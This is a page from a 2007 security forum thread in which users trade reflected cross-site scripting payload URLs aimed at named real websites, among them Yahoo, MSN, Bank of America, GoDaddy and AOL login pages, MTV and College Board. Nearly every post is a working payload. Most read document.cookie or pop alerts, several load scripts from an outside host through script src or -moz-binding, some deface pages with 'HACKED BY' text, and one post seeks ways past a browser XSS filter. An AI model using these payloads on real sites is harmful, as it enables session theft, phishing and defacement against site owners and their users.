Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Pages: PreviousFirst...3738394041424344454647...LastNext
Current Page: 42 of 65
Re: So it begins
Posted by: tx
Date: March 09, 2007 11:59PM

I probably should've made that clearer... I've edited the post as such

-tx @ lowtech-labs.org

Options: ReplyQuote
Re: So it begins
Posted by: trev
Date: March 10, 2007 07:54PM

Yahoo once again: http://siteexplorer.search.yahoo.com/search?p=http%3A%2F%2Fgoogle.com%22style%3D%22-moz-binding%2F**%2F%3Aurl%28http%3A%2F%2Fha.ckers.org%2Fxssmoz.xml%23xss%29&bwm=i

Options: ReplyQuote
Re: So it begins
Posted by: tx
Date: March 10, 2007 08:03PM

Salon:
http://www.salon.com/news/cookie756.html?URL=/%22%7D%0A%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%0A%7B%2F%2F
http://search.salon.com/salonsearch.php?search=%00%3Cscript%3Ealert('xss');%3C/script%3E&breadth=salon

EDIT: Added another one from http://astrocenter.astrology.msn.com . Note: This is different than the one thomaspollet posted last October http://sla.ckers.org/forum/read.php?3,44,1458#msg-1458 (which still hasn't been fixed, btw) , mainly in that it's POST as opposed to GET, and in that msn is nice enough to store the variable as a cookie (PreProfil) that expires in 2017 so it persists after the user has closed their browser.
http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://astrocenter.astrology.msn.com/msn/DeptHoroscope.aspx?AutomateState=&URLAfterSuccededSubmit=http%3A%2F%2Fastrocenter.astrology.msn.com%2Fmsn%2FMyToday.aspx%3FAf%3D-1000&FirstName=%22%3Balert(document.cookie)%3B%2F%2F&GenderSelector=1&MonthSelector=1&DaySelector=2&YearSelector=1942&Submit=Go

-tx @ lowtech-labs.org



Edited 6 time(s). Last edit at 03/10/2007 09:20PM by tx.

Options: ReplyQuote
Re: So it begins
Posted by: trev
Date: March 10, 2007 10:02PM

All those parked domains, they must be good for something...

http://vonea.com/index.php?sx=%22%3E%3Cscript%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2Fscript%3E
http://admedia.com/index.php?sx=%22%3E%3Cscript%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2Fscript%3E
http://ampea.com/index.php?sx=%22%3E%3Cscript%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2Fscript%3E
http://wexea.com/index.php?sx=%22%3E%3Cscript%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2Fscript%3E
http://hangovercombat.com/index.php?sx=%22%3E%3Cscript%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2Fscript%3E
http://www.magnamedia.us/index.php?sx=%22%3E%3Cscript%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2Fscript%3E
http://affiliate-viral-marketing.com/index.php?sx=%22%3E%3Cscript%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2Fscript%3E
http://forea.com/index.php?sx=%22%3E%3Cscript%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2Fscript%3E
http://cyberdyaryo.com/index.php?sx=%22%3E%3Cscript%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2Fscript%3E
http://lifetodigital.com/index.php?sx=%22%3E%3Cscript%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2Fscript%3E
http://kent2do.com/index.php?sx=%22%3E%3Cscript%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2Fscript%3E
http://badfood.org/index.php?sx=%22%3E%3Cscript%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2Fscript%3E
http://eurobytes.com/index.php?sx=%22%3E%3Cscript%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2Fscript%3E

Several hundred more of those: http://www.google.com/search?q=%22To+inquire+about+this+domain%22+%22Related+searches%22

http://logisticsolutions1980.com/ct.html?u=http://google.com/%22%20style=%22-moz-binding:url(http://ha.ckers.org/xssmoz.xml%23xss)&e=1
http://tucsons1stoprealtors.com/ct.html?u=http://google.com/%22%20style=%22-moz-binding:url(http://ha.ckers.org/xssmoz.xml%23xss)&e=1
http://www.buybritneyshair.com/ct.html?u=http://google.com/%22%20style=%22-moz-binding:url(http://ha.ckers.org/xssmoz.xml%23xss)&e=1
http://jybe.com/ct.html?u=http://google.com/%22%20style=%22-moz-binding:url(http://ha.ckers.org/xssmoz.xml%23xss)&e=1
http://pansoftware.com/ct.html?u=http://google.com/%22%20style=%22-moz-binding:url(http://ha.ckers.org/xssmoz.xml%23xss)&e=1

A million more of those: https://www.tdnam.com/

http://www.chestertonholdings.com/inquire.php?inquiry_domain=%22%3E%3Cscript%3Ealert(1)%3C/script%3E
http://www.inquireaboutthisdomain.com/?domainname=%22%3E%3Cscript%3Ealert(1)%3C/script%3E
http://www.sedo.com/search/searchresult.php4?keyword=%22%3E%3Cscript%3Ealert%28%22xss%22%29%3C%2Fscript%3E
http://washingtondcdental.com/%22%3E%3Cscript%3Ealert%28%22xss%22%29%3C/script%3E.cfm?t=5
http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://hus.parkingspa.com/handcrafted2.asp&search_text=%22%22%3E%3Cscript%3Ealert(%22xss%22)%3C/script%3E&search_source=60 [hus.parkingspa.com]
http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://www.industrydomains.com/&email=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E [industrydomains.com]



Edited 3 time(s). Last edit at 03/10/2007 10:44PM by trev.

Options: ReplyQuote
Re: So it begins
Posted by: tx
Date: March 11, 2007 06:18AM

*yawn* I'm drunk and tired...

but not too drunk for this: http://www.macfixitforums.com/postlist.php?Cat=&Board=Forum35%22%3E%3C%2F%73%63%72%69%70%74%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%27%78%73%73%27%29%3B%2F%2F heh, macs...

EDIT: https://onlineeast2.bankofamerica.com/cgi-bin/ias/0/E/EnrollEntryPoint?stateCode=AL%22;alert('xss');//
g'nite interwebs

-tx @ lowtech-labs.org



Edited 1 time(s). Last edit at 03/11/2007 06:43AM by tx.

Options: ReplyQuote
Re: So it begins
Posted by: rsnake
Date: March 12, 2007 05:39PM

Yay macs!

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: So it begins
Posted by: trev
Date: March 12, 2007 06:04PM

Requires user interaction:

[groups.google.com]

Click "More options" twice.

Options: ReplyQuote
Re: So it begins
Posted by: SW
Date: March 12, 2007 11:23PM


Options: ReplyQuote
Re: So it begins
Posted by: digi7al64
Date: March 12, 2007 11:31PM

http://qdb.hacktthissite.org/home.php?q=%22%3E%3Cscript+src%3Dhttp%3A%2F%2Fha.ckers.org%2Fs.js%3E%3C%2Fscript%3E

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

Options: ReplyQuote
Re: So it begins
Posted by: rsnake
Date: March 13, 2007 11:48AM

haha, nice!

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: So it begins
Posted by: FR3DC3RV
Date: March 13, 2007 04:29PM

http://www.blackeyedpeas.com/home/news/?searchTerms=%22%3E%3Cp%3EXSS+HACKED+BY+FR3DC3RV%3Cp%3E&submit=++Search++&categoryID=0&startDateMonth=3&startDateDay=3&startDateYear=2002&userLogin=&endDateMonth=3&endDateDay=13&endDateYear=2007&resultsPerPage=30&orderField=2&order=2

Search "><script>alert(document.cookie)</script>:
http://farejador.ig.com.br/busca.do
or
http://www.emf.no-ip.com/portal/search.html
or
http://www.u2.com/login.php

http://www.u2.com/search/index.php?keyword=%22%3E%3Cp%3E%3Cb%3EHOW+TO+DISMANTLE+AN+U2+WEBSITE%3F%3C%2Fp%3E%3Cp%3EHACKED+BY+FR3DC3RV%3C%2Fp%3E%3C%2Fb%3E&match=all&s_table=news&submit=1

-------------------------------
http://fr3dc3rv.blogspot.com



Edited 1 time(s). Last edit at 03/13/2007 04:54PM by FR3DC3RV.

Options: ReplyQuote
Re: So it begins
Posted by: trev
Date: March 14, 2007 09:05AM

http://add.yahoo.com/fast/help/us/widgets/cgi_feedback?email=%22style%3D%22-moz-binding%3Aurl%28http%3A%2F%2Fha.ckers.org%2Fxssmoz.xml%23xss%29%22

Options: ReplyQuote
Re: So it begins
Posted by: tx
Date: March 14, 2007 07:19PM

More Godaddy:
https://email.secureserver.net/login.php?domain=sla.ckers.org%22%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E%3Cp%20id=%22
https://idp.securepaynet.net/login.aspx?prog_id=xss&spkey=SPSWB116&login=&target=secure_transfer.asp&myaurl=&'onmouseover='alert(document.cookie%29 Mouseover 'Home' or the promotional links near the bottom of the page
https://idp.godaddy.com/shopper_new.aspx?pathway=01280d32-4185-4a35-aa98-022667f3a443&SPKey=GDDNAEB03&myaurl=&'onmouseover='alert(document.cookie%29 Mousover any link in the form

-tx @ lowtech-labs.org



Edited 2 time(s). Last edit at 03/14/2007 07:30PM by tx.

Options: ReplyQuote
Re: So it begins
Posted by: Kyran
Date: March 15, 2007 12:29PM

http://support.alcohol-soft.com/en/knowledgebase.php?postid=25209&title=%3Cscript%3Ealert(1)%3C/script%3E

- Kyran

Options: ReplyQuote
Re: So it begins
Posted by: daltd
Date: March 18, 2007 05:25AM

[[url=http://www.mtv.com/sitewide/utils/gamespot/gs_scripts.jhtml?gamespotURL=%22%3E%3Ctitle%3EMTV.com%20-%20XSS%20PoC%20-%20daltd%3C%3C//title%3E%3Cscript%3Ealert('XSS');%3C/script%3E]www.mtv.com[/url]]
[[url=http://sony.mtv.com/sony_moviemixer.php?src=sony_moviemixer.phpx&door=%22%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83));%3C/script%3E]sony.mtv.com[/url]]
[[url=http://videogames1.mtv.com/pages/gamespace/story.php?pid=%22%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83));%3C/script%3E&id=6121675&page=9]videogames1.mtv.com[/url]]



Edited 1 time(s). Last edit at 03/18/2007 05:45AM by daltd.

Options: ReplyQuote
Re: So it begins
Posted by: trev
Date: March 18, 2007 11:57AM

[http://www.flashback.info/leave.php?google.com/"/onclick="alert('xss')] - for Internet Explorer, click "gå videre"

Options: ReplyQuote
Re: So it begins
Posted by: Henaro
Date: March 18, 2007 09:58PM

http://www.authpro.com/cgi-bin/auth.fcgi?user=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Options: ReplyQuote
Re: So it begins
Posted by: beford
Date: March 19, 2007 02:52PM

http://research.microsoft.com/adapt/MSBNx/MSBNxManual.asp?path=x%22+onload=%22alert(/xss/);//



Edited 2 time(s). Last edit at 03/19/2007 02:54PM by beford.

Options: ReplyQuote
Re: So it begins
Posted by: Henaro
Date: March 19, 2007 03:17PM

Take this college board!

http://apps.collegeboard.com/search/quicksearch.jsp?formState=1&word=%22%3E%3Cscript%3Ealert(1);%3C/script%3E

You and your SATs. >:(

Options: ReplyQuote
Re: So it begins
Posted by: christ1an
Date: March 19, 2007 03:53PM

http://www.whiteacid.org/misc/xss_post_forwarder.php?

add this after xss_post_forwarder.php?
xss_target=http://faq.gmx.de/search/q.php&top=';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{}&query=';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{}



Edited 1 time(s). Last edit at 03/19/2007 03:54PM by christ1an.

Options: ReplyQuote
Re: So it begins
Posted by: jungsonn
Date: March 21, 2007 05:07PM

Wow still busy with these finds? ^^ you diehards! :)

Options: ReplyQuote
Re: So it begins
Posted by: beford
Date: March 21, 2007 08:05PM

hxxps://broadband.msn.com/account/index.asp?email=email@ya.com%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

I have not tested this one, however it should work on IE
hxxps://broadband.msn.com/account/rebate_center.asp?email=lolzor@gmail.com%22+style=%22background-image:%20url(javascript:alert('XSS'))

Options: ReplyQuote
Re: So it begins
Posted by: trev
Date: March 22, 2007 05:10AM

Yes, the second one works in IE - but only if you click "ok" on the warning (the web page uses SSL and this image is supposedly not transfered via SSL).



Edited 1 time(s). Last edit at 03/22/2007 07:28AM by trev.

Options: ReplyQuote
Re: So it begins
Posted by: Anonymous User
Date: March 22, 2007 06:25AM

I tried the 2nd one in IE7. It's not working...

Options: ReplyQuote
Re: So it begins
Posted by: epsteinbar
Date: March 22, 2007 08:24PM

http://www.snapfiles.com/downloadfind.php?st='';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{}

http://www.javabrewingco.com/search_results.asp?txtsearchParamType=';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//%22;alert(String.fromCharCode(88,83,83))//\%22;alert(String.fromCharCode(88,83,83))//--%3E%3C/SCRIPT%3E%22%3E'%3E%3CSCRIPT%3Ealert(String.fromCharCode(88,83,83))%3C/SCRIPT%3E=&{}



Edited 2 time(s). Last edit at 03/22/2007 08:28PM by epsteinbar.

Options: ReplyQuote
Re: So it begins
Posted by: ma1
Date: March 23, 2007 07:57PM

I'm really interested in knowing if any of these POCs, possibly combined with any of the known launch techniques, could work as a reflected XSS from an untrusted origin to a whitelisted website, meant to evade the NoScript block (against the latest anti-XSS development version).

All those I've tried so far do fail, but again I'm all ears for effective evasion approaches (other than social engineering).

Many thanks!

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript

Options: ReplyQuote
Re: So it begins
Posted by: kirke
Date: March 24, 2007 04:26AM

nice place for spoofing:
https://my.screenname.aol.com/_cqr/login/login.psp?mcState=initialized&mcState=initializ');alert('XSS');alert('add%20more%20XSS%20here%20%20--%20d&sitedomain=my.screenname.aol.com&authLev=1&siteState=**getOneFree.psp&lang=de&locale=null

There're some more injection places if you look at the returned page.
The strange part is, that you get different results for mozilla and IE, probably due to different handling of javascript errors.

Options: ReplyQuote
Re: So it begins
Posted by: FR3DC3RV
Date: March 24, 2007 05:17AM

http://www.tiinside.com.br/Pesquisa.asp?Num_Linhas=20&Texto=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&Onde=Tx
http://www.looksheetmusic.com/search.php?q=%22%3E%3Cscript%3Ealert%28%2FXSS+HACKED+BY+FR3DC3RV%2F%29%3C%2Fscript%3E&submitted=true&orderbyA=&vsmA=1&smpA=1&mnA=1&musicroomA=1&stagepassA=1

Insert "><script>alert(document.cookie)</script> as your email.
https://www.sign-up.to/signup.php?fid=1402&pid=1071

Insert "><script>alert(document.cookie)</script> as your email or " onclick=javascript:alert(document.cookie)// as your nickname:

http://ogame475.de/game/reg/new.php

-------------------------------
http://fr3dc3rv.blogspot.com

Options: ReplyQuote
Re: So it begins
Date: March 26, 2007 03:17AM

The site's glossary feature:
http://www.teenwire.com/glossary/glossary-definition.php?term=<script>alert(String.fromCharCode(34,84,117,114,110,32,111,110,46,32,84,117,110,101,32,105,110,46,32,68,114,111,112,32,111,117,116,46,34));</script>

The site's Planned Parenthood location area:
http://www.teenwire.com/clinics/cl-zip.php?%7ENum-Len-5%7EZip_Code="><script>alert(String.fromCharCode(34,72,101,121,32,104,101,121,32,73,32,119,97,110,116,101,100,32,67,104,105,110,101,115,101,32,116,97,107,101,97,119,97,121,33,32,72,101,121,32,104,101,121,33,32,87,111,111,32,119,111,111,32,119,111,111,33,34));</script>&x=10&y=5

The site's login area.
http://www.teenwire.com/login/
You can inject simple HTML to disrupt the page like XMP via POST request, but I doubt much can be accomplished on this one.


Awesome AnDrEw - That's The Sound Of Your Brain Crackin'
http://www.awesomeandrew.net/

Options: ReplyQuote
Re: So it begins
Date: March 26, 2007 03:50PM

http://www.opendiary.com/searchresults.asp?searchstring=%3Cscript%3Ealert(0)%3C/script%3E

Options: ReplyQuote
Pages: PreviousFirst...3738394041424344454647...LastNext
Current Page: 42 of 65


Sorry, only registered users may post in this forum.